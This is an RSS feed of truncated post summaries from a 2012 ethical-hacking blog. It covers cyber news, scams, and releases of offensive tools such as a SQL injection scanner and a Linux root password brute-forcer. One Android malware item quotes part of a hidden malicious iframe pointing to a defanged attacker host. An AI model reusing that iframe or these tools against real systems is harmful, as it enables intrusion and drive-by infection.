<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:media="http://search.yahoo.com/mrss/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><title>HackingTricks - Ethical Hacking and Penetration testing</title><link>http://www.hackingtricks.in/</link><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/blogspot/csAFg" /><description>A website on Ethical hacking and penetration testing guide. All the latest cyber world update, hacking tool, security papers, latest vulnerabilities and malwares.</description><language>en</language><managingEditor>noreply@blogger.com (Deepanker Verma)</managingEditor><lastBuildDate>Sat, 19 May 2012 00:14:48 PDT</lastBuildDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">685</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">25</openSearch:itemsPerPage><feedburner:info uri="blogspot/csafg" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>blogspot/csAFg</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item><title>SQLSentinel v.0.1 released</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/XemFhKPTVlg/sqlsentinel-v01-released.html</link><category>Hacking Tools</category><category>SQL Injection</category><category>SQL injection tools</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Fri, 18 May 2012 11:49:03 PDT</pubDate><guid 
isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-2481926589166481148</guid><description>


SQLSentinel is an open-source SQL injection testing tool. It is an automated tool that helps find SQL injection flaws in web applications.





This tool includes a web spider and a SQL error finder. It takes the URL of the website and then crawls the site to find parameters vulnerable to SQL injection errors. After it has finished the job, it will generate a PDF report which contains </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-19T00:19:03.156+05:30</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-d3XYRCInqQI/T7aZVQRGzqI/AAAAAAAACrs/ZGw-wa0haDM/s72-c/main+screen.jpeg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/sqlsentinel-v01-released.html</feedburner:origLink></item><item><title>Anonymous turns to India, Announced Operation India</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/0JBpr2tvyDM/anonymous-turns-to-india-announced.html</link><category>Anonymous hackers</category><category>Cyber News</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Thu, 17 May 2012 08:22:51 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-731514352679035221</guid><description>


The Anonymous group has been involved in many hacking activities. So far we've seen Operation Tunisia, Operation Zimbabwe, Operation Egypt and Operation Iran by this hacking group. Now, Anonymous has turned its attention to the subcontinent in Operation India. The infamous hacker group has now announced Operation India. They have also pulled down the websites of the Indian Congress and the Indian Supreme Court. </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-17T20:52:51.563+05:30</app:edited><media:thumbnail url="http://img.youtube.com/vi/cYESlyheDCo/default.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/anonymous-turns-to-india-announced.html</feedburner:origLink></item><item><title>Google Books open redirection Vulnerability</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/veiVWnk2dR4/google-books-open-redirection.html</link><category>Cyber News</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Wed, 16 May 2012 03:43:49 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-8862218748804090666</guid><description>

Recently I noticed a vulnerability in Google Books, which has been merged into Google Play. It has an open redirection vulnerability in http://books.google.com/

I have also reported it to the Google security team and got a positive reply. But this vulnerability does not fall into Google's reward program, and the vulnerability still exists on the website.

What is an Open Redirection Vulnerability?

If a </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-16T16:13:49.021+05:30</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/google-books-open-redirection.html</feedburner:origLink></item><item><title>Hash Code Verifier, A tool to verify the File Integrity</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/A5Jf9MhQEaM/hash-code-verifier-tool-to-verify-file.html</link><category>Hacking Tools</category><category>penetration testing</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Wed, 16 May 2012 00:07:02 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-2122702749628113574</guid><description>


Recently I saw a nice tool called Hash Code Verifier, developed by the BreakTheSecurity Team. This tool is designed to create and analyze hashes of files. This will help to check the integrity of the file on the server.

Nowadays, hackers bind trojans with software and upload it on the internet. So most of the download websites also often publish the MD5 or SHA hash of the file so that users </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-16T12:37:02.443+05:30</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-yTQOAEaNHbQ/T7NRfXFwuLI/AAAAAAAACrA/mM5kLENGlAk/s72-c/Calculate_Hash_multiple_files.gif" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/hash-code-verifier-tool-to-verify-file.html</feedburner:origLink></item><item><title>"Your Account Has Been Blocked," New Hotmail Phishing</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/UockwSPfe7s/your-account-has-been-blocked-new.html</link><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Mon, 14 May 2012 08:39:59 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-5440927727238804775</guid><description>

Hotmail users are advised not to open any kind of account alert email. A new phishing attack is trying to steal the login details of Hotmail users. Users are getting an email entitled “E-mail account alert!” which warns them that their accounts have been blocked. It also contains a link to verify and unblock the account. Clicking on the link takes users to a website which asks users to enter their login</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-14T21:09:59.384+05:30</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/your-account-has-been-blocked-new.html</feedburner:origLink></item><item><title>Orion Browser Dumper v1.0 released</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/g8v8wkdNSN4/orion-browser-dumper-v10-released.html</link><category>Hacking Tools</category><category>forensics</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Sat, 12 May 2012 10:40:27 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-6010984940706477130</guid><description>




Jean-Pierre LESUEUR (DarkCoderSc) has released another browser forensic tool for the community, called "Orion Browser Dumper v1.0".

This software is an advanced local browser history extractor (dumper). In less than a few seconds (as with Browser Forensic Tool) it will extract the whole history content of the most popular web browsers, currently Internet Explorer, Mozilla FireFox, Google Chrome, COMODO </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-12T23:10:27.115+05:30</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-vhKL4Mk6JpI/T66gMyv5AyI/AAAAAAAACp0/shqWFKKOTBw/s72-c/Orion+Browser+Dumper+v1.0+released.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/orion-browser-dumper-v10-released.html</feedburner:origLink></item><item><title>Apple Latest Update exposes passwords in clear text</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/5qnjdPt7LLA/apple-latest-update-exposes-passwords.html</link><category>mac trojan</category><category>Cyber News</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Mon, 07 May 2012 02:35:51 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-2209299880355140814</guid><description>

Apple has just released the new Lion security update, Mac OS X 10.7.3, which accidentally exposes passwords in clear text. This update puts a debug log file, which stores the user’s password in clear text, outside of the encrypted area. This log file contains the passwords of all the users who have logged in since the update was applied.

This flaw was found by a security researcher David Emery, who </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-07T15:05:51.132+05:30</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/apple-latest-update-exposes-passwords.html</feedburner:origLink></item><item><title>What is Drive by Download Malware?</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/l3AqC0A8I3I/what-is-drive-by-download-malware.html</link><category>malwares</category><category>Hacking tutorials</category><category>drive by download</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Sun, 06 May 2012 08:38:10 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-7699159922464361378</guid><description>


There are many posts on my blog where I have covered malware that
uses the Drive by Download method to infect various systems on the internet. But the
Drive by Download method seems confusing for many people. This is a requested
post which I am writing for those who have sent me mail regarding this post.



Drive by Download is a method which some malware uses to
infect and spread. This is not a </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-06T21:08:10.882+05:30</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/what-is-drive-by-download-malware.html</feedburner:origLink></item><item><title>New Drive By Download Malware Notcom Infecting Android Devices</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/8jXOplpZ4do/new-drive-by-download-malware-notcom.html</link><category>Cyber News</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Sun, 06 May 2012 02:05:27 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-5892539754272297290</guid><description>

A new Android malware, Notcom (NotCompatible), has been discovered which infects Android users by Drive By Download when they visit certain malicious websites. These malicious websites contain a malicious iframe that looks at the User-Agent string of each visitor's request.
The iframe code is this:
&amp;lt;iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-06T14:35:27.986+05:30</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/new-drive-by-download-malware-notcom.html</feedburner:origLink></item><item><title>Download Browser Forensic Tool v2.0</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/z61GUs4iZmE/download-browser-forensic-tool-v20.html</link><category>Hacking Tools</category><category>penetration testing</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Sun, 06 May 2012 01:36:11 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-3488025189166669594</guid><description>
Browser Forensic Tool v2.0 is an advanced local browser history search engine. This tool will search for and extract the URLs for chosen keywords from all the popular web browsers, currently Internet Explorer, Google Chrome, Mozilla FireFox, RockMelt, Comodo Dragon and Opera.








The program will try to find the URLs in the history title and search for the searched keyword(s). If the keyword is found </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-06T14:06:11.359+05:30</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-wQabY9TBQWY/T6Y3ex57J3I/AAAAAAAACoM/TWYeXf362lM/s72-c/Browser+Forensic+Tool+v2.0+-+Advanced+browser+history+search+engine.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/download-browser-forensic-tool-v20.html</feedburner:origLink></item><item><title>Hackers Blackmail Dexia Bank, demanded $196,000 for not to leak data</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/7VABC0EHy70/hackers-blackmail-dexia-bank-demanded.html</link><category>Cyber News</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Thu, 03 May 2012 23:42:29 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-4511832575368202449</guid><description>




A group of hackers has released a statement in which they claimed to have broken into the servers of Elantis, a Belgian credit provider owned by Dexia. They also demanded that the bank pay 150,000 EUR ($196,000) before May 4, or they will leak all the customers' data.



"In addition to database tables containing data such as internal login credentials, we downloaded numerous tables which contain </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-04T12:12:29.193+05:30</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-mD75LDTSQ2w/T6N6Mk6Fd9I/AAAAAAAACnc/9_r9R3v7JW4/s72-c/Hackers-Blackmail-Dexia-Bank-Pay-Idiot-Tax-or-We-Release-Customer-Data-2.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/hackers-blackmail-dexia-bank-demanded.html</feedburner:origLink></item><item><title>Insecure Cryptographic Storage Vulnerability on Web Applications</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/lIgkbv6wYc4/insecure-cryptographic-storage.html</link><category>penetration testing</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Thu, 03 May 2012 11:53:16 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-5422312868978194457</guid><description>

This vulnerability exists in web applications due to developers' lack of knowledge. Most organizations use web applications to manage all of their tasks. Every company is now putting its confidential documents online. But sometimes these applications, designed to access and manage data, fail to protect data. This results in data leakage.

Most common problem with the web </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-04T00:23:16.630+05:30</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/insecure-cryptographic-storage.html</feedburner:origLink></item><item><title>"The Unknowns" Claims to Hack ESA, NASA, US Air Force and Others</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/9OGwmHVPJiA/unknowns-claims-to-hack-esa-nasa-us-air.html</link><category>Cyber News</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Wed, 02 May 2012 03:23:33 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-8763937475128032746</guid><description>
A group of hackers called "The Unknowns" has posted a document on the online clipboard Pastebin and claimed to have hacked some high-profile websites. These websites include the Bahrain Ministry of Defense, French Ministry of Defense, Jordanian Yellow Pages, European Space Agency (ESA), Thai Royal Navy, Renault, Harvard University, US Military’s Joint Pathology Center, NASA’s Glenn Research Center and the US</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-02T15:53:33.329+05:30</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-3-_vRw-ND_o/T6EJVOETc9I/AAAAAAAACm0/GW9xcGw-RZ4/s72-c/The-Unknowns-Hack-NASA-US-Air-Force-ESA-and-Others-2.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/unknowns-claims-to-hack-esa-nasa-us-air.html</feedburner:origLink></item><item><title>Fastest password Cracker oclHashcat-plus v0.08 Released</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/Tk-JYAc_9R0/fastest-password-cracker-oclhashcat.html</link><category>Hacking Tools</category><category>password cracking</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Tue, 01 May 2012 22:51:07 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-7064569639720852268</guid><description>


oclHashcat-plus is the world's first and only GPGPU-based rule engine and the world's fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker.





Features


Free
Multi-GPU (up to 16 GPUs)
Multi-Hash (up to 24 million hashes)
Multi-OS (Linux &amp;amp; Windows native binaries)
Multi-Platform (OpenCL &amp;amp; CUDA support)
Multi-Algo (see below)
Low resource utilization, you can still watch movies or play games while </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-02T11:21:07.007+05:30</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-NAgn-Zya2x0/T6DKxZmXKoI/AAAAAAAACmo/lI_ys0YtblA/s72-c/oclHashcat-plus+v0.08+Released+fastest+password+Cracker.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/05/fastest-password-cracker-oclhashcat.html</feedburner:origLink></item><item><title>WebSploit Toolkit version 1.6 released</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/HFL-FmKNA8A/websploit-toolkit-version-16-released.html</link><category>LFI</category><category>RFI</category><category>penetration testing</category><category>Brute Forcing Tool</category><category>XSS</category><category>network hacking</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Mon, 30 Apr 2012 00:17:22 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-1738917455046513186</guid><description>



WebSploit is an open source project used to scan and analyse remote systems in order to find various types of vulnerabilities. This tool is very powerful and supports multiple vulnerabilities. All the scripts of this tool are written in Python, and users can also modify the source code to customize its behaviour according to their needs.



These are main vulnerabilities which can be found</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-30T12:47:22.729+05:30</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-K0qvhzYaU9g/T548B33F2II/AAAAAAAAClk/rte6nrkDK6E/s72-c/WebSploit+Toolkit+1.6+Released.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/04/websploit-toolkit-version-16-released.html</feedburner:origLink></item><item><title>Tips to protect Facebook account from hackers</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/G_Wjvj5f3xw/tips-to-protect-facebook-account-from.html</link><category>facebook hacking</category><category>Hacking tutorials</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Sat, 28 Apr 2012 23:18:05 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-3893296282059210260</guid><description>

Facebook, the social networking website, or as we might say, our virtual world. Most people live more in this virtual world than in their real world. We share our photos, moods and thoughts with our friends. But with the increase in the use of Facebook, hackers are also very active, and they always try to hack innocent people's Facebook accounts.


Many people do not care about their Facebook account </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-29T11:48:05.464+05:30</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-DNESbDCl7Ag/T2LjndOfbII/AAAAAAAACRY/byDKArTC0lw/s72-c/fbsecure.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/03/tips-to-protect-facebook-account-from.html</feedburner:origLink></item><item><title>WordPress 3.3.1 Suffers Multiple CSRF Vulnerabilities</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/6vifThQqXBg/wordpress-331-suffers-multiple-csrf.html</link><category>wordpress</category><category>Website hacking</category><category>vulnerability</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Sat, 28 Apr 2012 22:58:52 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-5636389332337277320</guid><description>




WordPress version 3.3.1 suffers from multiple cross site
request forgery vulnerabilities. These CSRF vulnerabilities allow attackers to
add administrators/users, delete administrators/users, change post title,
approve and unapprove comment, delete comment, change background image, change
Site Address, insert custom header image, change site title, change
administrator's email, change </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-29T11:28:52.920+05:30</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/04/wordpress-331-suffers-multiple-csrf.html</feedburner:origLink></item><item><title>90% SSL websites are vulnerable to the BEAST SSL attack</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/HKfgEjxrfqk/90-ssl-websites-are-vulnerable-to-beast.html</link><category>Website hacking</category><category>Cyber News</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Sat, 28 Apr 2012 00:27:30 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-7271918694300308943</guid><description>

According to the latest cyber report by the Trustworthy Internet Movement (TIM), a nonprofit organization dedicated to solving Internet security, privacy and reliability problems, 90% of the websites running HTTPS are vulnerable to the BEAST SSL attack.

This report is based on the data provided by SSL Pulse project. This project scanned top 1 million websites with </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-28T12:57:30.809+05:30</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-OEWpeIP8RD8/T5ubFw93aaI/AAAAAAAACko/3Dkc27HGWGs/s72-c/90%25+SSL+sites+vulnerable+to+the+BEAST+SSL+attack.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/04/90-ssl-websites-are-vulnerable-to-beast.html</feedburner:origLink></item><item><title>New Facebook Scam offering Free Ray-Bans and TOMS shoes</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/wXGttUOetrw/new-facebook-scam-offerig-free-ray-bans.html</link><category>facebook scams</category><category>Cyber News</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Sat, 28 Apr 2012 00:10:26 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-6912335231386399786</guid><description>


Just two days after the announcement of Facebook's partnership with five security giants, a new scam has arrived on Facebook. This new Facebook scam offers users free pairs of Ray-Bans or TOMS shoes. This is nothing but another survey scam in which the scammer tricks users into completing an online survey. Each completed survey earns some bucks for the scammer.

These messages can be </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-28T12:40:26.270+05:30</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-3L0cM2e_Wdg/T5uUj5nEInI/AAAAAAAACkU/jrjd0u3IPgU/s72-c/raybans.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/04/new-facebook-scam-offerig-free-ray-bans.html</feedburner:origLink></item><item><title>VMware confirms hackers stole source code</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/F5Pfe76QwPI/vmware-confirms-hackers-stole-source.html</link><category>vmware</category><category>Hacking News</category><category>Cyber News</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Thu, 26 Apr 2012 22:47:24 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-4817377896753911205</guid><description>


A few days back, a hacker calling himself "Hardcore
Charlie" posted a portion of source code and claimed it to be part
of the VMware ESX source code. After many rumors, VMware has now confirmed that the
source code posted by the hacker is part of the code from its ESX Hypervisor
product.





The company also posted on its blog and said that a single file
from the VMware ESX source code had been </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-27T11:17:24.336+05:30</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-OZ0fmsWrqAc/T5oycFKCPiI/AAAAAAAACkA/94UqzK-HKlo/s72-c/vmware-source.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/04/vmware-confirms-hackers-stole-source.html</feedburner:origLink></item><item><title>FBI and SOCA Seize 36 Websites For Card Fraud</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/XzwvIV-2dEk/fbi-and-soca-seize-36-websites-for-card.html</link><category>credit card hack</category><category>Cyber News</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Thu, 26 Apr 2012 22:29:05 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-2203033644377613918</guid><description>




The Federal Bureau of Investigation (FBI) and the Serious Organized
Crime Agency (SOCA) have worked together and seized 36 domains. All these 36
websites were involved in credit card fraud. These websites were all found
to be trading illegally-obtained payment card details.





The organization has also informed the financial institutions
and banks whose customers have been affected by these </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-27T10:59:05.547+05:30</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-QmcAPR-4MXY/T5ouNL48d-I/AAAAAAAACj0/sU4xWOVbuNs/s72-c/SOCA-and-the-FBI-Seize-36-Sites-Involved-in-Card-Fraud-2.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/04/fbi-and-soca-seize-36-websites-for-card.html</feedburner:origLink></item><item><title>Collection of Windows password recovery tools</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/kA0Q38KLwKQ/collection-of-windows-password-recovery.html</link><category>hack windows password</category><category>Windows trick</category><category>Hacking windows xp administrator password</category><category>password cracking</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Tue, 01 May 2012 02:37:40 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-1373430031798559942</guid><description>



Being human, forgetting one's Windows password is a common thing. I am sure you have come across or heard that one of your friends or family members has just forgotten his/her password and can't access the content of their computer. Well, we all are bound to experience a blonde moment one time or several times, but when it comes to forgetting your Windows login password it can be quite </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-01T15:07:40.111+05:30</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-Rc8HIHDIPHg/T5ZURDCiRTI/AAAAAAAACio/5N4GMkzhy0A/s72-c/windows-password-reset.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/04/collection-of-windows-password-recovery.html</feedburner:origLink></item><item><title>Response Analysis and Further Testing Tool - RAFT</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/VqpYjQ23hrU/response-analysis-and-further-testing.html</link><category>Hacking Tools</category><category>Web Application Security Scanner Framework</category><category>penetration testing</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Mon, 23 Apr 2012 09:48:51 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-5807575309645886655</guid><description>

This post is about one more vulnerability identification tool. Although this tool is not so famous, it works well. RAFT is a suite of security tools which are used as a testing tool for vulnerability identification in web applications. RAFT utilizes common shared elements to make testing and analysis easier. The tool provides visibility into areas that other tools do not, such as various </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-23T22:18:51.677+05:30</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-J1--3qHIHqs/T5WHgPGpLpI/AAAAAAAACiY/dWvFqiOWxpI/s72-c/raft_main.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/04/response-analysis-and-further-testing.html</feedburner:origLink></item><item><title>Rootdabitch version 0.1 released, Multithreaded Linux root password Bruteforcer</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/ZSh_jDEZTvo/rootdabitch-version-01-released.html</link><category>Hacking Tools</category><category>linux</category><category>Brute Forcing Tool</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Fri, 20 Apr 2012 10:53:10 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-6485878107498435823</guid><description>




Rootdabitch v0.1 is released. It is a multithreaded Linux/UNIX tool to crack local root through brute-force.
For Brute-forcing, it uses Sucrack which is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su. 
This tool is fast and works in the background, so you can easily do other work. It is a local brute forcer which uses 10 passwords in 3 seconds. When root</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-20T23:23:10.449+05:30</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-rzJWZnebQGU/T5GhgTZoRFI/AAAAAAAACf8/R9i5S2ecxto/s72-c/banner0.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/04/rootdabitch-version-01-released.html</feedburner:origLink></item><item><title>“Switch to Green Facebook Profile,” New Survey Scam Hits Facebook</title><link>http://feedproxy.google.com/~r/blogspot/csAFg/~3/V2bFjddjn5Y/switch-to-green-facebook-profile-new.html</link><category>facebook scams</category><category>Cyber News</category><author>noreply@blogger.com (Deepanker Verma)</author><pubDate>Thu, 19 Apr 2012 05:29:02 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5009365634130283389.post-3591196179317606894</guid><description>
Facebook, a billion-dollar company, has been trying to protect its users. Every time Facebook takes some protective step, a new scam arrives. But users are more responsible than Facebook for the success of scammers. They always fall for the false claims and offers of scammers, such as Timeline removal, pink Facebook and so on.
This time a new scam arrives on Facebook which offers to turn Facebook </description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-04-19T17:59:02.838+05:30</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-wWPYqDyRfF4/T4_9jtEYzzI/AAAAAAAACfQ/RmzwR0ZRFgI/s72-c/switch-green-5.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.hackingtricks.in/2012/04/switch-to-green-facebook-profile-new.html</feedburner:origLink></item><media:rating>nonadult</media:rating></channel></rss>

